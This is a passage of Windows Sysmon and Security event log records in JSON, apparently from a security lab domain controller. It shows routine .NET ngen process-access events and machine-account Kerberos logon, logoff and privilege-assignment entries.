{A837DB8D-040E-5F25-0000-00104E260B00}\r\nTargetProcessId: 2976\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:56.742","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-00104E260B00}","TargetProcessId":"2976","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6319,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:56.742\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-00104E260B00}\r\nTargetProcessId: 2976\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:56.742","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-00104E260B00}","TargetProcessId":"2976","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6320,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:56.758\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0428-5F25-0000-0010129F0B00}\r\nTargetProcessId: 2976\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:56.758","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0428-5F25-0000-0010129F0B00}","TargetProcessId":"2976","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6321,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:56.977\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0428-5F25-0000-001035A30B00}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:56.977","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0428-5F25-0000-001035A30B00}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6322,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:56.977\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0428-5F25-0000-001035A30B00}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:56.977","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0428-5F25-0000-001035A30B00}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:56","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6323,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:56.992\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0428-5F25-0000-001035A30B00}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:56.992","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0428-5F25-0000-001035A30B00}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220693,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xBA7CA\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xba7ca","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:57:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220694,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xBA7CA\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t55012\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xba7ca","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"55012","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:57:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220695,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xBA7CA\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xba7ca","LogonType":"3","EventReceivedTime":"2020-08-01 05:57:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:00","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220696,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xBA959\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xba959","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:57:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
